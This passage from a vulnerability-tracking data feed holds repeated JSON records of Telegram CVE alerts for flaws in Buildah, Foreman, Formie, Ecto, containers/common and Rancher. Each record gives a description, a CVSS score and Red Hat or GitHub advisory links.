https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2445\n18. https://access.redhat.com/errata/RHSA-2025:2449\n19. https://access.redhat.com/errata/RHSA-2025:2454\n20. https://access.redhat.com/errata/RHSA-2025:2701\n21. https://access.redhat.com/errata/RHSA-2025:2710\n22. https://access.redhat.com/errata/RHSA-2025:3301\n23. https://access.redhat.com/errata/RHSA-2025:3573\n24. https://access.redhat.com/security/cve/CVE-2024-9675\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-04-10T21:49:44.000000Z"}, {"uuid": "2c0d5c51-fb81-4be7-9f2b-4236da92903d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8686", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11358", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-04-10T21:41:41.385Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2445\n18. https://access.redhat.com/errata/RHSA-2025:2449\n19. https://access.redhat.com/errata/RHSA-2025:2454\n20. https://access.redhat.com/errata/RHSA-2025:2701\n21. https://access.redhat.com/errata/RHSA-2025:2710\n22. https://access.redhat.com/errata/RHSA-2025:3301\n23. https://access.redhat.com/errata/RHSA-2025:3573\n24. https://access.redhat.com/security/cve/CVE-2024-9675\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-04-10T21:49:44.000000Z"}, {"uuid": "67aa957e-a60c-478c-ac53-819d164f9802", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8563", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11358", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-04-10T21:41:41.385Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2445\n18. https://access.redhat.com/errata/RHSA-2025:2449\n19. https://access.redhat.com/errata/RHSA-2025:2454\n20. https://access.redhat.com/errata/RHSA-2025:2701\n21. https://access.redhat.com/errata/RHSA-2025:2710\n22. https://access.redhat.com/errata/RHSA-2025:3301\n23. https://access.redhat.com/errata/RHSA-2025:3573\n24. https://access.redhat.com/security/cve/CVE-2024-9675\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-04-10T21:49:44.000000Z"}, {"uuid": "b010b16c-29e4-43ad-befb-b02ce84b64ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8700", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11358", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-04-10T21:41:41.385Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2445\n18. https://access.redhat.com/errata/RHSA-2025:2449\n19. https://access.redhat.com/errata/RHSA-2025:2454\n20. https://access.redhat.com/errata/RHSA-2025:2701\n21. https://access.redhat.com/errata/RHSA-2025:2710\n22. https://access.redhat.com/errata/RHSA-2025:3301\n23. https://access.redhat.com/errata/RHSA-2025:3573\n24. https://access.redhat.com/security/cve/CVE-2024-9675\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-04-10T21:49:44.000000Z"}, {"uuid": "2e61e2c8-9b9c-46d8-a055-144f5dde86cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8709", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11358", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-04-10T21:41:41.385Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2445\n18. https://access.redhat.com/errata/RHSA-2025:2449\n19. https://access.redhat.com/errata/RHSA-2025:2454\n20. https://access.redhat.com/errata/RHSA-2025:2701\n21. https://access.redhat.com/errata/RHSA-2025:2710\n22. https://access.redhat.com/errata/RHSA-2025:3301\n23. https://access.redhat.com/errata/RHSA-2025:3573\n24. https://access.redhat.com/security/cve/CVE-2024-9675\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-04-10T21:49:44.000000Z"}, {"uuid": "28a8425e-9be3-4d55-8d32-cbd7f97a1943", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:9459", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11358", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-04-10T21:41:41.385Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2445\n18. https://access.redhat.com/errata/RHSA-2025:2449\n19. https://access.redhat.com/errata/RHSA-2025:2454\n20. https://access.redhat.com/errata/RHSA-2025:2701\n21. https://access.redhat.com/errata/RHSA-2025:2710\n22. https://access.redhat.com/errata/RHSA-2025:3301\n23. https://access.redhat.com/errata/RHSA-2025:3573\n24. https://access.redhat.com/security/cve/CVE-2024-9675\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-04-10T21:49:44.000000Z"}, {"uuid": "a4a21817-1fca-4f91-887f-ff59bf603edc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8708", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11358", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-04-10T21:41:41.385Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2445\n18. https://access.redhat.com/errata/RHSA-2025:2449\n19. https://access.redhat.com/errata/RHSA-2025:2454\n20. https://access.redhat.com/errata/RHSA-2025:2701\n21. https://access.redhat.com/errata/RHSA-2025:2710\n22. https://access.redhat.com/errata/RHSA-2025:3301\n23. https://access.redhat.com/errata/RHSA-2025:3573\n24. https://access.redhat.com/security/cve/CVE-2024-9675\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-04-10T21:49:44.000000Z"}, {"uuid": "cf7d88ba-9585-4743-8255-c9a9cfa83794", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P9HH-MH5X-WVX3", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11421", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32427\n\ud83d\udd25 CVSS Score: 5.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N)\n\ud83d\udd39 Description: Formie is a Craft CMS plugin for creating forms. Prior to 2.1.44, when importing a form from JSON, if the field label or handle contained malicious content, the output wasn't correctly escaped when viewing a preview of what was to be imported. As imports are undertaking primarily by users who have themselves exported the form from one environment to another, and would require direct manipulation of the JSON export, this is marked as moderate. This vulnerability will not occur unless someone deliberately tampers with the export. This vulnerability is fixed in 2.1.44.\n\ud83d\udccf Published: 2025-04-11T13:42:13.854Z\n\ud83d\udccf Modified: 2025-04-11T13:42:13.854Z\n\ud83d\udd17 References:\n1. https://github.com/verbb/formie/security/advisories/GHSA-p9hh-mh5x-wvx3", "creation_timestamp": "2025-04-11T13:51:13.000000Z"}, {"uuid": "6a4f7c2d-8f76-431f-9d2a-ef530b2fc187", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8703", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11358", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-04-10T21:41:41.385Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2445\n18. https://access.redhat.com/errata/RHSA-2025:2449\n19. https://access.redhat.com/errata/RHSA-2025:2454\n20. https://access.redhat.com/errata/RHSA-2025:2701\n21. https://access.redhat.com/errata/RHSA-2025:2710\n22. https://access.redhat.com/errata/RHSA-2025:3301\n23. https://access.redhat.com/errata/RHSA-2025:3573\n24. https://access.redhat.com/security/cve/CVE-2024-9675\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-04-10T21:49:44.000000Z"}, {"uuid": "dc80bf06-1d45-46e5-9ad8-ea64daa5acd4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8846", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11358", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-04-10T21:41:41.385Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2445\n18. https://access.redhat.com/errata/RHSA-2025:2449\n19. https://access.redhat.com/errata/RHSA-2025:2454\n20. https://access.redhat.com/errata/RHSA-2025:2701\n21. https://access.redhat.com/errata/RHSA-2025:2710\n22. https://access.redhat.com/errata/RHSA-2025:3301\n23. https://access.redhat.com/errata/RHSA-2025:3573\n24. https://access.redhat.com/security/cve/CVE-2024-9675\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-04-10T21:49:44.000000Z"}, {"uuid": "8da05147-2271-4bec-803f-0554fedab2c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8718", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11163", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-8553\n\ud83d\udd25 CVSS Score: 6.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L)\n\ud83d\udd39 Description: A vulnerability was found in Foreman's loader macros introduced with report templates. These macros may allow an authenticated user with permissions to view and create templates to read any field from Foreman's database. By using specific strings in the loader macros, users can bypass permissions and access sensitive information.\n\ud83d\udccf Published: 2024-10-31T15:01:16.401Z\n\ud83d\udccf Modified: 2025-04-09T20:37:17.798Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8717\n2. https://access.redhat.com/errata/RHSA-2024:8718\n3. https://access.redhat.com/errata/RHSA-2024:8719\n4. https://access.redhat.com/errata/RHSA-2024:8906\n5. https://access.redhat.com/security/cve/CVE-2024-8553\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2312524", "creation_timestamp": "2025-04-09T20:48:26.000000Z"}, {"uuid": "929cc93e-d146-4294-8d38-12334af0e3b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8719", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11163", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-8553\n\ud83d\udd25 CVSS Score: 6.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L)\n\ud83d\udd39 Description: A vulnerability was found in Foreman's loader macros introduced with report templates. These macros may allow an authenticated user with permissions to view and create templates to read any field from Foreman's database. By using specific strings in the loader macros, users can bypass permissions and access sensitive information.\n\ud83d\udccf Published: 2024-10-31T15:01:16.401Z\n\ud83d\udccf Modified: 2025-04-09T20:37:17.798Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8717\n2. https://access.redhat.com/errata/RHSA-2024:8718\n3. https://access.redhat.com/errata/RHSA-2024:8719\n4. https://access.redhat.com/errata/RHSA-2024:8906\n5. https://access.redhat.com/security/cve/CVE-2024-8553\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2312524", "creation_timestamp": "2025-04-09T20:48:26.000000Z"}, {"uuid": "50c00827-0339-41a7-b641-d83f552a4781", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8906", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11163", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-8553\n\ud83d\udd25 CVSS Score: 6.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L)\n\ud83d\udd39 Description: A vulnerability was found in Foreman's loader macros introduced with report templates. These macros may allow an authenticated user with permissions to view and create templates to read any field from Foreman's database. By using specific strings in the loader macros, users can bypass permissions and access sensitive information.\n\ud83d\udccf Published: 2024-10-31T15:01:16.401Z\n\ud83d\udccf Modified: 2025-04-09T20:37:17.798Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8717\n2. https://access.redhat.com/errata/RHSA-2024:8718\n3. https://access.redhat.com/errata/RHSA-2024:8719\n4. https://access.redhat.com/errata/RHSA-2024:8906\n5. https://access.redhat.com/security/cve/CVE-2024-8553\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2312524", "creation_timestamp": "2025-04-09T20:48:26.000000Z"}, {"uuid": "be63f050-4488-458f-8c18-77382e7960b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2XXX-FHC8-9QVQ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11126", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2017-20166\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: Ecto 2.2.0 lacks a certain protection mechanism associated with the interaction between is_nil and raise.\n\ud83d\udccf Published: 2023-01-10T00:00:00.000Z\n\ud83d\udccf Modified: 2025-04-09T17:30:12.094Z\n\ud83d\udd17 References:\n1. https://github.com/advisories/GHSA-2xxx-fhc8-9qvq\n2. https://github.com/elixir-ecto/ecto/pull/2125\n3. https://github.com/elixir-ecto/ecto/commit/db55b0cba6525c24ebddc88ef9ae0c1c00620250\n4. https://groups.google.com/forum/#%21topic/elixir-ecto/0m4NPfg_MMU", "creation_timestamp": "2025-04-09T17:47:51.000000Z"}, {"uuid": "0297d9e8-8f91-459b-978f-84b41f93efa0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:9459", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14322", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9341\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:N)\n\ud83d\udd39 Description: A flaw was found in Go. When FIPS mode is enabled on a system, container runtimes may incorrectly handle certain file paths due to improper validation in the containers/common Go library. This flaw allows an attacker to exploit symbolic links and trick the system into mounting sensitive host directories inside a container. This issue also allows attackers to access critical host files, bypassing the intended isolation between containers and the host system.\n\ud83d\udccf Published: 2024-10-01T18:52:00.686Z\n\ud83d\udccf Modified: 2025-05-01T15:56:31.977Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10147\n2. https://access.redhat.com/errata/RHSA-2024:10818\n3. https://access.redhat.com/errata/RHSA-2024:7925\n4. https://access.redhat.com/errata/RHSA-2024:8039\n5. https://access.redhat.com/errata/RHSA-2024:8112\n6. https://access.redhat.com/errata/RHSA-2024:8238\n7. https://access.redhat.com/errata/RHSA-2024:8263\n8. https://access.redhat.com/errata/RHSA-2024:8428\n9. https://access.redhat.com/errata/RHSA-2024:8690\n10. https://access.redhat.com/errata/RHSA-2024:8694\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:9454\n13. https://access.redhat.com/errata/RHSA-2024:9459\n14. https://access.redhat.com/security/cve/CVE-2024-9341\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2315691\n16. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L169\n17. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L349", "creation_timestamp": "2025-05-01T16:14:32.000000Z"}, {"uuid": "9cc28b40-6aa5-4d66-8366-739f5f5b3129", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J5HQ-5JCR-XWX7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11413", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-52280\n\ud83d\udd25 CVSS Score: 7.7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N)\n\ud83d\udd39 Description: A Exposure of Sensitive Information to an Unauthorized Actor vulnerability in SUSE rancher  which allows users to watch resources they are not allowed to access, when they 